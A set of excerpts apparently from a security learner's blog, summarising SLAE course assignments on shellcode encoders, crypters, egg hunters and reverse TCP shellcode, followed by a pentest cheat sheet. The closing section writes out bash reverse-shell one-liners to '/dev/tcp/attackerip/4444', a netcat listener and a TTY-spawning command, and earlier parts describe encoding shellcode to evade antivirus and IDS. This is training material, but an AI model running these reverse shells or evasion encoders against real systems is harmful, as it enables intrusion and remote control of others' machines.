Polymorphism is a generic method to prevent pattern-matching. Pattern-matching means that a program P (an antivirus or an IDS) has a data-base with ‘signatures’. A signature is bytes suite identifying a program. We can defeat such pattern matching programs by replacing assembly instructions with other equivalent set of instructions which will result in different shellcode. Consider the below example clearing a register and moving some value into it.
...
Metasploit is an awesome penetration testing software which a large number of exploits, payloads, encoders etc. Our goal in this assignment is to analyze three different payloads for linux/x86 generated with msfpayload (I will be using msfvenom instead) using GDB/Ndisasm/Libemu.
...
The last assignment is to create a crypter which will encrypt the shellcode.
Our goal for this assignment is:
Create Crypter Can use any encryption scheme Can use any programming language for implementation ...
The fourth assignment is to create a custom shellcode encoder and decoder. The whole point of encoding shellcode is change its signature so that the shellcode is not detected by Antivirus softwares and Intrution Detection Systems. This is critical in most of real world exploitation scenarios where AV and IDS are present. The encoder will change the original shellcode into some other shellcode which in assembly might seem like meaningless instructions. Upon execution, the decoder stub present before the encoded shellcode will decode the encoded shellcode and once completed will jump to the decoded shellcode.
Here is how we are going to implement the encoder.
XOR each byte of the original shellcode with 0xAA. Apply NOT operation on each byte of the shellcode. Rotate to Right the whole shellcode 3 times. Apply Additive XOR operation on the whole shellcode. ...
The third assigment is to study about Egg Hunters and implement a working demo of egg hunters with configurable payloads. So, what is an Egg Hunter?!.
An egghunter is a short piece of code which is safely able to search the Virtual Address Space for an “egg” – a short string signifying the beginning of a larger payload. The egghunter code will usually include an error handling mechanism for dealing with access to non allocated memory ranges.
...
Assignment #2: Shell Reverse TCP Shellcode (Linux/x86) The second assigment is to create Reverse TCP Shellcode which does following.
Connects back to an IP address and port Execs a shell upon connection The IP address and port number are configurable ...
The SecurityTube Linux Assembly Expert (SLAE) aims to teach the basics of assembly language on the Linux platform from a security perspective and its application to writing shellcode, encoders, decoders and crypters, among other things.
The exam style of SecurityTube Linux Assembly Expert (SLAE) is bit different. You have to complete 7 assignments of varying difficulty and post it on your blog. Also, store the source code and all other helper scripts that you have used in your GitHub account.
...
Often during pen tests you may obtain a shell without having tty, yet wish to interact further with the system. Here are some commands which will allow you to spawn a tty shell. Obviously some of this will depend on the system environment and installed packages.
Shell Spawning
python -c 'import pty; pty.spawn("/bin/sh")' echo os.system('/bin/bash') ...
There might be several occasions where you might have code execution on a target machine and you sit there wondering what to do next.
Well here is what you can do. Setup netcat listener on port 4444.
nc -nvlp 4444 Bash
exec /bin/bash 0&0 2>&0 0<&196;exec 196<>/dev/tcp/attackerip/4444; sh <&196 >&196 2>&196 exec 5<>/dev/tcp/attackerip/4444 cat <&5 | while read line; do $line 2>&5 >&5; done # or: while read line 0<&5; do $line 2>&5 >&5; done bash -i >& /dev/tcp/attackerip/4444 0>&1 ...